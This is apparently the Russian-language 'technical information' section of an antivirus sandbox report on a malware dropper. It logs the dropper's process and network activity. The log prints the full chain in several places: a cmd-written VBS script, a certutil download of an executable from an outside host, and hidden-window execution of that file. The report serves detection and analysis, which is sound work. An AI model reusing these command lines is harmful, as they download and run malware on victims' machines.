Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/Paul%20Clark/PO%20059420.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\scr...
- %TEMP%\script.vbs
- %TEMP%\script.vbs
- 'ju###lickam.com':443
- 'ju###lickam.com':443
- DNS ASK ju###lickam.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/Paul%20Clark/PO%20059420.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\scr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://justclickam.com/Paul%20Clark/PO%20059420.exe %TEMP%\bin.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 3
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://justclickam.com/Paul%20Clark/PO%20059420.exe %TEMP%\bin.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://justclickam.com/Paul%20Clark/PO%20059420.exe %TEMP%\bin.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe